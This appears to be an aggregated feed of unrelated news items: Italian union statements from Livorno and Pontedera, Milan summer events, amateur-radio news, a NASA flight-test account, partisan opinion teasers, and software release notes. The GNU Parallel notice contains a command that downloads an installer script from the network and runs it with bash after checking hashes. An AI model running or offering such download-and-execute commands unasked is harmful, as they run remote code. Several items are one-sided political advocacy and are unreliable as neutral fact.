Negli anni questo metodo è stato presentato come responsabilità. In realtà ha finito per trasformare la responsabilità in semplice accettazione delle decisioni aziendali. Ogni sacrificio viene descritto come inevitabile, ogni arretramento come necessario, ogni accordo come il migliore possibile.
Ma il compito di un delegato sindacale non è accompagnare i lavoratori ad accettare nuovi sacrifici. È rappresentarli, difenderne il salario, contrastare le scelte sbagliate e pretendere investimenti e prospettive. Quando invece si firma tutto, si giustifica tutto e si invita sempre e soltanto ad avere pazienza, si smette di rappresentare gli operai e si finisce per assecondare un modello che punta a una fabbrica senza conflitto e a lavoratori sempre più ricattabili.
Gli accordi al ribasso non hanno salvato il futuro dello stabilimento. Lo hanno progressivamente indebolito. Ogni firma che ha ridotto diritti e tutele è stata giustificata in nome del domani.
Quel domani oggi è sotto gli occhi di tutti: esuberi, fermate produttive, solidarietà e assenza di una prospettiva industriale.
Anche la politica porta una responsabilità enorme. Quando c'è da inaugurare una mostra sulla Vespa o partecipare a una celebrazione, le istituzioni sono sempre presenti. Quando invece occorre pretendere investimenti, difendere l'occupazione e chiedere conto delle scelte industriali della proprietà, prevalgono il silenzio e l'inerzia. Da anni Comune, Regione e Governo assistono senza intervenire al progressivo indebolimento dello stabilimento. Si evita di mettere in discussione la proprietà e di aprire un confronto serio sul futuro industriale di Pontedera. Eppure è compito delle istituzioni pretendere un piano industriale credibile, vincolare gli incentivi pubblici agli investimenti e garantire un confronto permanente sul futuro produttivo del territorio. Il lavoro si difende con gli atti, non con le fotografie.
Per questo non possiamo accettare che gli ammortizzatori sociali diventino una componente strutturale del modello Piaggio, né che siano sempre gli operai a pagare il prezzo delle scelte aziendali. Allo stesso modo, il sindacato non può ridursi a certificare decisioni già prese. Serve rompere un equilibrio costruito sul silenzio, sulla rassegnazione e sulla continua ricerca della pace sociale.
La storia del movimento operaio insegna una cosa semplice: nessun diritto è stato regalato. Tutto è stato conquistato attraverso il conflitto. Chi rinuncia al conflitto finisce inevitabilmente per accettare l'arretramento dei diritti e le decisioni dell'azienda. Ed è proprio questa scelta a rendere sempre più evidente da quale parte si decide di stare. Chi oggi invita ad abbassare la testa non sta difendendo il lavoro. Sta soltanto rendendo più semplice il compito di chi vuole continuare a ridurre salari, diritti e occupazione.
Per questo il primo passo è ricostruire partecipazione, consapevolezza e organizzazione. È il momento di scegliere da che parte stare. Noi, come sempre, stiamo dalla parte degli operai.
CHI FIRMA LA RESA È PARTE DEL PROBLEMA.
I DIRITTI NON SI FIRMANO. SI CONQUISTANO CON LA LOTTA.
RSU USB PIAGGIO

Nella giornata di ieri una delegazione dei collettivi, sindacati e partiti che da anni lottano contro la militarizzazione del nostro porto e la complicità della nostra città con le guerre americane e israeliane ha incontrato il presidente dell’Autorità di Sistema Davide Gariglio e il dirigente demanio portuale Marilli. Incontro richiesto durante la recente manifestazione di protesta davanti a Palazzo Rosciano.
Abbiamo nuovamente espresso la nostra forte opposizione rispetto alla possibilità che l’azienda Drass, che dovrà produrre sottomarini da guerra per il governo indonesiano, possa ricevere in concessione spazi del nostro porto per i test di questi sottomarini.
Sappiamo inoltre che le concessioni per gli spazi che si stanno liberando in porto verranno rilasciate per periodi che raggiungono anche i dieci anni, motivo di ulteriore preoccupazione qualora aziende impegnate nella filiera bellica dovessero appropriarsene, rendendo di fatto il nostro porto luogo di produzione e test di mezzi destinati alla guerra.
Le ragioni che sono state espresse, a sostegno della nostra posizione, non hanno solo un carattere etico e politico. Basterebbero quelle. Ma anche economiche ed occupazionali. I traffici e le attività civili, ormai è ampiamente noto, hanno un’incidenza occupazionale ben maggiore. Inoltre, vi sono anche ragioni legate alla sicurezza dei lavoratori portuali e non solo.
Al netto di quali saranno le decisioni dell’Autorità e i bandi di assegnazione che usciranno siamo pronte e pronti a dare battaglia come tante altre volte, ricordando sempre che la guerra non è fatta solo di bombe e proiettili, ma anche e soprattutto di logistica, mezzi di trasporto e demolizione, come i caterpillar israeliani che fermammo a settembre al molo Italia.
Potere al Popolo
Attac Livorno
USB Livorno

C’è un nuovo motivo per fare un salto a Milano Sesto quest’estate.
Ha aperto Jurassic World: The Experience, la grande esperienza immersiva ufficiale dedicata alla celebre saga cinematografica che trasporta i visitatori nel mondo di Isla Nublar, tra dinosauri a grandezza naturale, scenografie spettacolari e ambientazioni ispirate ai film.
Dopo aver conquistato città come Londra, Madrid e Bangkok, l’esperienza arriva per la prima volta in Italia e sceglie MilanoSesto, a Sesto San Giovanni, come unica tappa italiana. L’evento sarà visitabile fino al 10 gennaio 2027.

Un viaggio nel mondo di Jurassic World
Non si tratta di una semplice mostra. Jurassic World: The Experience è un percorso immersivo che permette di entrare nelle ambientazioni iconiche della saga cinematografica, incontrando dinosauri animatronici a grandezza naturale e ricostruzioni fedeli dei laboratori e delle aree del parco.
Durante la visita si attraversano alcune delle location più famose del film. Tra queste ci sono gli iconici cancelli di Jurassic World, il laboratorio di creazione dei dinosauri e la valle popolata da gigantesche creature preistoriche. Inoltre, non mancano effetti speciali, suoni e scenografie che rendono l’esperienza ancora più coinvolgente.

Un’esperienza per grandi e piccoli
L’attrazione è pensata per tutta la famiglia. I bambini potranno osservare da vicino dinosauri come il Triceratopo, il Velociraptor e il maestoso Tyrannosaurus Rex, mentre gli adulti ritroveranno le atmosfere della saga cinematografica iniziata con Jurassic Park.
Grazie agli animatronici, agli effetti sonori e alle installazioni interattive, la visita permette di vivere un’avventura che va oltre la classica esposizione museale. Per questo motivo è una delle esperienze più attese dell’estate nell’area milanese.

Dove si trova e quando visitarla
Jurassic World: The Experience è allestita nell’area MilanoSesto, in viale Italia 576 a Sesto San Giovanni.
Per prenotare è possibile consultare il sito ufficiale dell’esperienza:
https://jurassicworldexperience.com/it/
Credits Photo
sito Jurassicworldexperience.com
Info Milano
L'articolo Jurassic World a Milano: unica tappa italiana proviene da InfoMilano.news.
Mailman è un software libero per la gestione delle discussioni via mail e le liste di distribuzione. Mailman è integrato con il web, al fine di semplificare agli utenti la gestione degli account e agli ai proprietari (owners) l'amministrazione delle liste. Mailman comprende come parte integrante il sistema di archiviazione, il processamento automatico dei rimbalzi (bounce), il filtro dei contenuti, la spedizione dei digest, filtri anti spam, e altro.
Mailman è un software libero distribuitosotto la GNU General Public License, e scritto nel linguaggio di programmazione Python.


Negli ultimi giorni USB Livorno ha inviato decine di segnalazioni, diffide e denunce agli organi competenti in merito al rischio elevato di stress termico per i lavoratori. Parliamo principalmente di piazzali all’aperto e capannoni industriali.
Sono già diversi i malori registrati, almeno due presso la fabbrica Trelleborg in via March e su un piazzale gestito dalla Porto2000.
In porto, per ben due volte, lavoratori e RLS hanno interrotto temporaneamente le operazioni di carico cellulosa in stiva, dopo aver constatato temperature insopportabili. I'8 luglio si riunirà, presso l'Autorità di Sistema, il comitato salute e sicurezza proprio su questo tema.
Richieste di intervento urgente sono state inviate presso alcuni piazzali di logistica come MVN, magazzini, ad esempio DHL, Fondazione Goldoni, Solvay, Magna Closures Le richieste sono sempre le medesime ma trovano costantemente l’opposizione dei datori di lavoro. Sospensione delle attività, pause aggiuntive, locali idonei e attrezzati per abbattere le temperature durante lo stop alle attività, cambi turno e nei casi limite accesso alla cassa integrazione così come previsto dai protocolli.
Il riferimento chiaro è l’indice calcolato tra temperatura e umidità. Se si supera una certa soglia i lavoratori devono essere messi in sicurezza. Purtroppo, nella stragrande maggioranza dei casi, senza l’intervento tempestivo del sindacato o dei rappresentanti dei lavoratori per la sicurezza le aziende tendono a garantire la produzione a tutti i costi a discapito della salute e della sicurezza dei lavoratori.
In questo senso, oltre ad invitare i lavoratori e le lavoratrici a contattare la nostra organizzazione sindacale in caso di necessità, crediamo sia urgente prevedere meccanismi automatici di intervento in caso di rischio stress termico e relative sanzioni per le aziende che non rispettano le procedure. L’ordinanza regionale è limitata solo ad alcuni settori mentre nelle fabbriche e nei piazzali portuali e della logistica si mette a rischio la vita. Così come in tanti altri luoghi di lavoro.
Usb Livorno

Am zweiten Juli-Wochenende funkt das Schweizer Nationalteam unter dem Rufzeichen HB9HQ um den Einzug in die Top Ten.
Am Samstag, 11. Juli 2026, exakt um 14.00 Uhr Schweizer Sommerzeit, fällt der Startschuss. 24 Stunden lang läuft die «IARU HF World Championship». Die USKA schickt wie jedes Jahr die Headquarter-Station HB9HQ ins Rennen, um die Schweiz im globalen Gesamtklassement möglichst weit nach vorne zu bringen. Ziel für 2026 ist das Knacken der Top-Ten-Ränge.
Strategie
Das Prinzip dieses sportlichen Grossereignisses verlangt strategisches Geschick. Die über 160 Landesverbände der International Amateur Radio Union schicken ihre HQ-Stationen auf die Jagd nach Punkten. In der Luft herrscht dann dichtes Gedränge. Wer HB9HQ anruft, loggt einen wertvollen Multiplikator. Die offiziellen Verbandsstationen senden neben dem üblichen Signalrapport das Kürzel ihrer Landesverbände, im Schweizer Fall also «USKA». Andere Nationen antworten mit «DARC», «ARRL» oder «JARL». Eine Besonderheit gilt für Funktionäre des Weltverbandes. Die Vorstands- und Aufsichtsratsmitglieder verteilen als Multiplikatoren ihre jeweilige Region. So sendet beispielsweise IARU Region 1-Kassier Andy HB9JOE den Zusatz «R1» für die IARU-Region 1.
Für alle gewöhnlichen Teilnehmerinnen und Teilnehmer gilt eine andere Regel. Sie tauschen im QSO neben der Signalstärke die ITU-Zone ihres Standorts aus. Wer von Schweizer Boden aus funkt, übergibt die Ziffer «28». Der Rapport lautet im Idealfall 5928 in Phonie oder 59928 in Telegrafie. Beim modernen Remote-Betrieb entscheidet übrigens nicht der Sitzplatz des Operateurs vor dem Bildschirm, sondern der physische Standort der Antenne, die das Signal in die Ionosphäre schickt.
Jedes QSO zählt
Der Erfolg des Schweizer Nationalteams hängt massiv von den hiesigen Funkamateurinnen und Funkamateuren ab. Jedes einzelne QSO aus der Schweiz stärkt dem Team den Rücken. Die genaue Aufteilung, welche Funkteams auf den Bändern von 160 bis 10 m in welchen Betriebsarten (CW und SSB) das Rufzeichen HB9HQ benützen, ist auf der USKA-Website aufgeführt. Wer teilnimmt, sammelt Punkte für das beliebte HB9HQ-Award, das die USKA wieder in vier Leistungsklassen ausgibt.
Weitere nützliche Links:
Viel Glück
Andy, HB9JOE
Leiter Radiosports der USKA
Published: HB9HGH 2026-07-01 15:02:14

A un anno dall'insediamento
Gianluca Mazzini, IK4LZH

Siamo arrivati al primo anno dall’insediamento di questo Consiglio Direttivo Nazionale. Un anno certamente non semplice. E, devo dirlo con sincerità, anche abbastanza diverso da come me lo ero immaginato. Pensavo che avremmo potuto concentrare molte energie sull’innovazione, sulle novità, su nuovi progetti, muovendoci in uno scenario consolidato e relativamente ordinato. Invece ci siamo trovati, molto più spesso, a doverci occupare della gestione quotidiana, dell’ordinario, delle pendenze, delle urgenze, delle tante piccole e grandi cose che permettono all’Associazione di funzionare.
Credo sia giusto parlarne. Anzi, credo sia doveroso.
Perché siamo volontari. Tutti noi prendiamo le attività del CDN per quello che sono: un servizio reso all’Associazione, accanto al nostro lavoro, ai nostri affetti, alle nostre famiglie, alle nostre attività personali. E accanto alla nostra passione, che resta prima di tutto la radio. Prima dell’associazionismo, prima della gestione, prima delle carte, delle email, dei verbali, dei conti, delle scadenze.
La radio è il motivo per cui siamo qui.
Con questa premessa, è doveroso parlare anche delle ragazze e dei ragazzi di ARI. Sono splendidi. E se molte cose funzionano, funzionano grazie a loro.
Un tempo erano molti di più. Poi, con gli anni, il numero delle persone operative è diminuito, per motivi diversi, non sempre facili da capire fino in fondo. Anche quando, nelle gestioni precedenti, si è cercato di rafforzare la struttura, non è stato semplice riuscirci. Non per disattenzione, ma per oggettiva complessità.
3 min read

Flight testing is a team sport. For nearly 80 years, teams at NASA’s Armstrong Flight Research Center in Edwards, California, have used flight testing to push the limits of aerodynamics and advance aviation.
Earlier this year, NASA’s Crossflow Attenuated Natural Laminar Flow (CATNLF) initiative tested a wing concept that would maximize the smooth flow of air known as laminar flow, which could lower fuel costs for future airliners. During flight testing, researchers strapped a scale-model CATNLF wing to the bottom of a NASA F-15 aircraft.
Here’s what a day of CATNLF flight testing looked like.

Ground crews ready the aircraft for the mission. If the operation involves a chase plane — a second aircraft to monitor the test flight — it would also be prepared, along with its crew.
Pilots, engineers, maintenance techs, project leads, researchers, photographers, and videographers meet to review the flight’s goals, weather reports, and final details.

Researchers head to the control room to complete day-of checks, confirming all communications, displays, and instruments are functioning.
Pilots suit up in life support, including custom‑fit pressure suits, harnesses, helmets, and masks. If a photographer, videographer, or flight test engineer will be in the aircraft’s back seat, they do the same.
The pilot completes preflight checks with the crew chief and technicians for the aircraft’s electrical systems. The pilot and the crew chief sign a flight preparedness report confirming the aircraft is ready to fly.
Inside the control room, the team prepares to monitor the flight using the same set of test cards, a step-by-step plan for the flight.
The pilot and backseat crew member climb into their seats, strap in, and secure any gear they’ve brought for the test. The pilot completes preflight ground checks.
The pilot communicates with the control tower and taxis to the runway. Control room teams at NASA Armstrong monitor the aircraft via radio.
The pilot accelerates down the runway and, at the proper speed, pulls back on the stick to take off. Once airborne, the pilot coordinates with air traffic control at Edwards Air Force Base and the NASA Armstrong control room while flying to the designated test area.

At the test location, the team coordinates with the pilot on altitude, speed, and maneuvers. The test conductor relays each task, and the pilot completes them one-by-one. The pilot and control room monitor the performance of the hardware, instruments, aircraft, or software throughout the sequence. After completing the test points, the pilot returns to base.
The pilot lands and taxis to the ramp at NASA Armstrong, where the crew chief meets the jet. After the pilot exits, the aircraft is towed into the hangar for maintenance.
The pilot, project team, and mission controlstaff return to the briefing room tocapture lessons learned and document items for follow-up.
Teams download flight data for analysis. If two flights are scheduled, preparations begin immediately for the second.



The Kubuntu Focus team has upped the performance ante of its M2 and Zr laptops with the latest, greatest CPUs from Intel.
L’Istituto storico della Resistenza e dell’età contemporanea in Provincia di Livorno, quale centro di ricerca storica e di conservazione del patrimonio bibliotecario e archivistico, presenta le iniziative realizzate sul territorio nel corso del 2025. Questo in continuità con le nostre principali finalità: la ricerca e la divulgazione storica e culturale, l’attività di didattica e di formazione, l’incremento e la custodia del patrimonio documentario.
Per tutta la stagione estiva, nel centro di Milano, arriva una nuova destinazione pensata per chi ama il design e gli aperitivi all’aria aperta. All’interno del cortile di Palazzo Cordusio Gran Meliá ha aperto il Café Swarovski, un esclusivo pop-up estivo che veste il Giardino Cordusio con un allestimento ispirato all’inconfondibile stile della celebre maison austriaca.
Un’esperienza estiva nel cuore della città
L’iniziativa sarà aperta fino alla fine di settembre ed è il risultato della collaborazione tra Swarovski e Palazzo Cordusio Gran Meliá, uno degli hotel di lusso più recenti del centro milanese.
Un’oasi verde a pochi passi dal Duomo
Ogni giorno migliaia di persone attraversano Piazza Cordusio senza immaginare che, dietro lo storico edificio progettato da Luca Beltrami alla fine del XIX secolo, si trovi un elegante giardino interno immerso nella tranquillità.
Dal 2023 il palazzo ospita Palazzo Cordusio Gran Meliá, hotel cinque stelle che ha restituito alla città uno spazio per anni destinato agli uffici. Oggi il Giardino Cordusio è una delle location più raffinate dove fermarsi per un pranzo, un cocktail o un aperitivo nel cuore di Milano.
L’atmosfera firmata Swarovski
Per l’estate 2026 il giardino si rinnova completamente grazie al Café Swarovski. L’allestimento richiama l’eleganza degli anni Sessanta con colori pastello, dettagli luminosi, lampadari impreziositi da cristalli, sedute in velluto e tessuti personalizzati.
L’idea è quella di offrire un’esperienza immersiva capace di fondere design, ospitalità e cucina in una delle cornici più affascinanti del centro cittadino.
Cocktail e dolci dal tocco scenografico
Il menù include cocktail, bevande e dessert creati appositamente per questa esperienza, con una presentazione che richiama l’estetica Swarovski. Tra gli elementi più originali spicca il ghiaccio a forma di diamante, studiato per valorizzare ogni drink. Alcune proposte vengono inoltre servite sulle eleganti porcellane della collezione Swarovski x Rosenthal.
Una delle novità dell’estate a Milano
Negli ultimi anni Piazza Cordusio è diventata uno dei simboli della nuova Milano dedicata al lusso e all’ospitalità internazionale. Il Café Swarovski si inserisce perfettamente in questo contesto, proponendo un’esperienza a tempo che combina moda, design e gastronomia in una location esclusiva.
Per chi desidera vivere un aperitivo o una pausa in un luogo fuori dal comune, il giardino segreto di Palazzo Cordusio è senza dubbio una delle proposte più interessanti dell’estate milanese.
L'articolo Il giardino nascosto di Palazzo Cordusio si trasforma con il Café Swarovski proviene da InfoMilano.news.
Chi desidera trascorrere qualche ora nella natura senza lasciare Milano ha una nuova destinazione da scoprire. All’interno di Oasi Ca’ Granda, nella zona sud della città, è stato inaugurato il Campo dei Girasoli: uno spazio circondato dal verde dove passeggiare tra oltre 30.000 girasoli, avventurarsi in un labirinto naturale e vivere un’esperienza rilassante a contatto con l’ambiente.
Situato in via Ripamonti 101, all’interno di una delle aree verdi più grandi di Milano, il nuovo campo si candida a diventare uno dei luoghi simbolo dell’estate.
Un grande polmone verde alle porte della città.
Con una superficie di oltre 45 ettari, Oasi Ca’ Granda è uno degli angoli più suggestivi del capoluogo lombardo. Al suo interno si alternano campi coltivati, risaie, orti, frutteti, aree umide e percorsi naturalistici, offrendo un paesaggio che fa dimenticare di trovarsi a pochi minuti dal centro.
L’oasi ospita inoltre numerose specie animali e rappresenta un’occasione ideale per riscoprire la ricchezza della biodiversità locale.
Un mare di girasoli e un percorso tutto da vivere.
La grande novità dell’estate 2026 è il Campo dei Girasoli, un’immensa distesa fiorita che invita grandi e piccoli a passeggiare tra i filari, rilassarsi e immortalare scorci dai colori vivaci.
Tra gli elementi più apprezzati spicca il labirinto naturale realizzato all’interno del campo, pensato per regalare un’esperienza divertente e coinvolgente a tutta la famiglia.
Completano l’allestimento aree dedicate al relax, punti panoramici e installazioni perfette per ammirare il paesaggio e scattare fotografie.
Porta a casa un girasole !
Tra le esperienze proposte c’è anche la possibilità di raccogliere un girasole e conservarlo come ricordo della visita.
Un gesto semplice che permette di vivere ancora più da vicino il legame con la natura e con il mondo agricolo.
Aperitivi al tramonto e sapori del territorio !
Il Campo dei Girasoli è anche un luogo dove trascorrere piacevoli momenti all’aria aperta.
Durante la stagione vengono organizzati aperitivi al tramonto, eventi e iniziative dedicate alla valorizzazione delle eccellenze locali.
Un’occasione per rilassarsi nel verde, gustare prodotti a chilometro zero e godersi l’atmosfera dei tramonti estivi nella campagna milanese.
Un appuntamento disponibile solo per poche settimane.
Essendo legato alla fioritura stagionale, il Campo dei Girasoli sarà aperto soltanto per un periodo limitato. Per questo gli organizzatori consigliano di prenotare con anticipo, in particolare nei weekend e nelle fasce orarie più richieste.
Tra passeggiate, fotografia, relax ed esperienze nella natura, il nuovo spazio di Oasi Ca’ Granda rappresenta un modo originale per vivere l’estate a Milano e concedersi una pausa dal ritmo della città senza dover andare lontano.
PRENOTAZIONI :
https://www.eventbrite.it/e/campo-dei-girasoli-tickets-1991905455839
Info Milano
L'articolo 30.000 girasoli, aperitivi immersi nel verde e natura: l’esperienza dell’estate a Milano proviene da InfoMilano.news.
A mesi dalle mobilitazioni culminate nei due giorni di sciopero del febbraio 2026, durante i quali lavoratori e attivisti USB sono stati minacciati di licenziamento e denuncia per i picchetti davanti alla sede aziendale, restano irrisolte le gravi criticità nell'appalto DHL di Livorno.
B.S. Autotrasporti continua a sottrarsi a un confronto serio con i lavoratori e con USB. Il dialogo con coordinatori e responsabili è spesso inesistente, rendendo impossibile affrontare i problemi che emergono quotidianamente.
USB ha proposto incontri periodici tra coordinatori e corrieri per migliorare l'organizzazione dei giri, distribuire equamente i carichi di lavoro, prevenire contestazioni disciplinari e rendere più efficiente il servizio. Una proposta che l'azienda continua a ignorare.
Ai lavoratori viene imposto il rigoroso rispetto delle procedure DHL senza garantire condizioni che consentano di operare in sicurezza, nel rispetto del Codice della Strada e delle normative vigenti. Carichi di lavoro e tempi di consegna rendono sempre più difficile rispettare contemporaneamente tutte queste prescrizioni.
Restano inoltre aperte le violazioni contrattuali: decurtazioni unilaterali di ferie e ROL per esigenze aziendali, senza il consenso dei lavoratori, e il mancato riconoscimento della maggiorazione prevista dal CCNL per il personale di magazzino impiegato il sabato.
Dopo essere stata costretta a riconoscere USB come interlocutore sindacale, l'azienda continua a mantenere un atteggiamento ostile verso i lavoratori organizzati. Contestazioni disciplinari e sanzioni vengono applicate a pioggia e con crescente severità. Si passa da pesanti decurtazioni salariali a sospensioni dal lavoro e dalla retribuzione sempre più lunghe, con un progressivo inasprimento dell'azione disciplinare che sembra preludere anche al possibile ricorso al licenziamento. Un'escalation che, in diversi casi, assume un evidente carattere intimidatorio e ritorsivo nei confronti di chi rivendica i propri diritti o partecipa all'attività sindacale.
A fronte di questi provvedimenti, l'azienda continua inoltre a non fornire documentazione che dimostri l'effettiva applicazione delle presunte penali da parte della committenza DHL, utilizzate per giustificare le sanzioni.
Persistono pressioni e intimidazioni nei confronti dei lavoratori, in particolare degli iscritti e dei delegati sindacali, in un clima incompatibile con le libertà garantite dalla Costituzione e dallo Statuto dei Lavoratori. Non si tratta di episodi isolati, ma di un quadro complessivo che sembra mirare a scoraggiare ogni forma di iniziativa collettiva.
Emerge una precisa volontà di comprimere gli spazi del conflitto sindacale, trattando l'organizzazione dei lavoratori come un ostacolo alla continuità del servizio e alla circolazione delle merci, anziché come un diritto. Quando l'attività sindacale viene ostacolata, chi sciopera viene intimidito e chi organizza la protesta viene colpito con provvedimenti disciplinari o minacciato di conseguenze ancora più gravi, non è in discussione soltanto la posizione dei singoli lavoratori, ma il diritto collettivo di organizzarsi, contrattare e costruire rapporti di forza per difendere salario e sicurezza.
Per tutte queste ragioni USB ha riaperto formalmente lo stato di agitazione dal 6 maggio. Nonostante le ripetute richieste, l'azienda continua a rifiutare un confronto effettivo e ad assumere impegni concreti per risolvere i problemi denunciati dai lavoratori.
USB continuerà a intervenire su tutti i piani, sindacale, legale e di mobilitazione, per difendere diritti, sicurezza, salario e il pieno esercizio delle libertà sindacali.
Dopo aver formalmente diffidato l'azienda, denunciamo pubblicamente questo atteggiamento e ribadiamo che non accetteremo ulteriori intimidazioni, ricatti o comportamenti discriminatori.
USB LIVORNO

Gamers using KDE’s Plasma desktop have been suffering from a slight input delay in mouse movement that could lead to getting fragged.



di Valentina Bennati comedonchisciotte.org Dalla pandemia globale dichiarata nel 2020 ai conflitti internazionali, passando per crisi economiche, tensioni sociali e un flusso continuo di notizie allarmanti, sono tante le persone che, negli ultimi anni, hanno iniziato a vivere in uno stato di tensione quasi permanente. Giorno dopo giorno siamo stati esposti a immagini, informazioni e […]
L'articolo Vivere sempre sotto pressione indebolisce il corpo: come spezzare il circolo dello stress proviene da Come Don Chisciotte.
Di Alireza Niknam Negli ultimi anni, il nome dell’Albania è stato citato più che mai in relazione a progetti e attori stranieri. Questo piccolo Paese dei Balcani, che un tempo cercava di presentarsi come modello di stabilità e sviluppo nell’Europa sud-orientale, si trova ora a dover affrontare seri interrogativi riguardo alla propria autonomia […]
L'articolo MEK e Sionismo, come l’Albania rischia di diventare la seconda Israele proviene da Come Don Chisciotte.
Pensavo di sapere cosa fosse la sofferenza, finché non l’ho vissuta davvero. Quello che ho scoperto era diverso, strano e doloroso. Com’è curioso il dolore. Nonostante la sua amarezza, nonostante il nostro desiderio di starne lontani quanto l’oriente è lontano dall’occidente, quando arriva c’è in esso una certa dolcezza. Sì, dolcezza. Per molto […]
L'articolo Un ferito di Gaza racconta le ventiquattro ore trascorse sotto un albero, dove dolore, morte, memoria e speranza si sono intrecciati nella guerra proviene da Come Don Chisciotte.
Di ConiareRivolta.org Per comprendere quale sarà l’impatto più duraturo del Governo Meloni sugli assetti economici dell’Italia, è sufficiente guardare alla recente Comunicazione della Commissione europea sul cosiddetto “Pacchetto primavera”, quell’insieme di raccomandazioni che la Commissione europea indirizza agli Stati membri dell’Unione per orientare politiche di bilancio e riforme. È il cuore della disciplina fiscale […]
L'articolo Il Pacchetto primavera della Ue e il pacco del Governo Meloni proviene da Come Don Chisciotte.
La Redazione di ComeDonChisciotte.org esprime le più sentite condoglianze alla famiglia, agli amici e ai colleghi del giornalista Vito Monaco, scomparso all’età di 81 anni. Monaco era volto notissimo dell’emittente tv Canale Italia. I funerali si terranno sabato 27 giugno alle 9.30 nel Duomo di Abano Terme.
L'articolo Addio a Vito Monaco, i funerali ad Abano Terme il 27 Giugno proviene da Come Don Chisciotte.

28 June 2026 Unifont 17.0.05 is now available. This is a minor release aligned with Unicode 17.0.0.
This release notably includes separate BDF, PCF, and OpenType font files with Unicode T-source Chinese glyphs created by Kusanagi_Sans and Kao Chen-tung (高振東) in font files beginning with "unifont_t". Many other Chinese glyphs have been added. See the ChangeLog file for details.
Download this release from GNU server mirrors at:
https://ftpmirror ... /unifont-17.0.05/
or if that fails,
https://ftp.gnu.o ... /unifont-17.0.05/
or, as a last resort,
ftp://ftp.gnu.org ... /unifont-17.0.05/
These files are also available on the unifoundry.com website:
https://unifoundr ... /unifont-17.0.05/
Font files are in the subdirectory
https://unifoundr ... 0.05/font-builds/
A more detailed description of font changes is available at
https://unifoundr ... nifont/index.html
and of utility program changes at
https://unifoundr ... nt-utilities.html
Information about Hangul modifications is at
https://unifoundr ... hangul/index.html
and
http://unifoundry ... l-generation.html


Drei Tage lang traf sich die internationale Amateurfunk-Gemeinschaft an der Ham Radio in Friedrichshafen. Für die Schweizer YLs und OM stand das Wochenende vom 26. bis 28. Juni 2026 ganz im Zeichen des Netzwerkens: Alte Freunde treffen und neue Kontakte knüpfen prägten das Geschehen am Stand der USKA.
Der direkte Austausch stand im Mittelpunkt. Viele angereiste Funkbegeisterte nutzten die Gelegenheit, um Fachgespräche zu vertiefen und bestehende Kontakte aufzufrischen. «Der persönliche Schwatz hier in den Hallen ist wirklich etwas sehr Spezielles, vor allem, wenn man sich sonst nur über den Transceiver trifft», bilanzierte ein Schweizer Besucher am Samstagabend.
Anstossen auf den Ham-Spirit
Zu den Höhepunkten des Messeprogramms gehörten die traditionellen Apéros am Stand der USKA, die am Freitag und am Samstag stattfanden (im Bild: Apéro am Samstag). Die Resonanz war an beiden Anlässen sehr gross: Jeweils rund 200 Gäste haben miteinander auf den Ham-Spirit angestossen.
Angesichts der hohen Temperaturen an diesem Wochenend griffen die Besucher neben Wein, Orangensaft und Knabbersnacks vor allem zu einer Erfrischung: viel Wasser. Die Logistik vor Ort funktionierte reibungslos und bot den passenden Rahmen, um ungezwungen miteinander ins Gespräch zu kommen.
Rundum gelungene Messe
Nach drei intensiven Messetagen bleibt ein positives Fazit. Ein grosses Dankeschön geht an alle Teilnehmerinnen und Teilnehmer, die die Veranstaltung mit Leben gefüllt haben. Gleichzeitig verdient die Leistung der Messeleitung Anerkennung: Ein grosses Kompliment geht an die Verantwortlichen in Friedrichshafen für die Organisation einer einmal mehr rundum gelungenen Ham Radio.
Published: HB9HGH 2026-06-28 12:50:02

GNU Parallel 20260622 ('Rape Gang Inquiry') has been released. It is available for download at: lbry://@GnuParallel:4
Quote of the month:
GNU Parallel is much nicer than xargs and more powerful ... definitely recommended!
-- boomertsfx@reddit
New in this release:
GNU Parallel - For people who live life in the parallel lane.
If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.
GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel.
If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops.
GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs.
For example you can run this to convert all jpeg files into png and gif files and have a progress bar:
parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif
Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:
find . -name '*.jpg' |
parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200
You can find more about GNU Parallel at: http://www.gnu ... rg/s/parallel/
You can install GNU Parallel in just 10 seconds with:
$ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \
fetch -o - http://pi.dk/3 ) > install.sh
$ sha1sum install.sh | grep c555f616391c6f7c28bf938044f4ec50
12345678 c555f616 391c6f7c 28bf9380 44f4ec50
$ md5sum install.sh | grep 707275363428aa9e9a136b9a7296dfe4
70727536 3428aa9e 9a136b9a 7296dfe4
$ sha512sum install.sh | grep b24bfe249695e0236f6bc7de85828fe1f08f4259
83320d89 f56698ec 77454856 895edc3e aa16feab 2757966e 5092ef2d 661b8b45
b24bfe24 9695e023 6f6bc7de 85828fe1 f08f4259 6ce5480a 5e1571b2 8b722f21
$ bash install.sh
Watch the intro video on http://www.youtub ... L284C9FF2488BC6D1
Walk through the tutorial (man parallel_tutorial). Your command line will love you for it.
When using programs that use GNU Parallel to process data for publication please cite:
O. Tange (2018): GNU Parallel 2018, March 2018, https://doi.org/1 ... 81/zenodo.1146014.
If you like GNU Parallel:
If you use programs that use GNU Parallel for research:
If GNU Parallel saves you money:
GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries.
The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell.
When using GNU SQL for a publication please cite:
O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32.
GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.

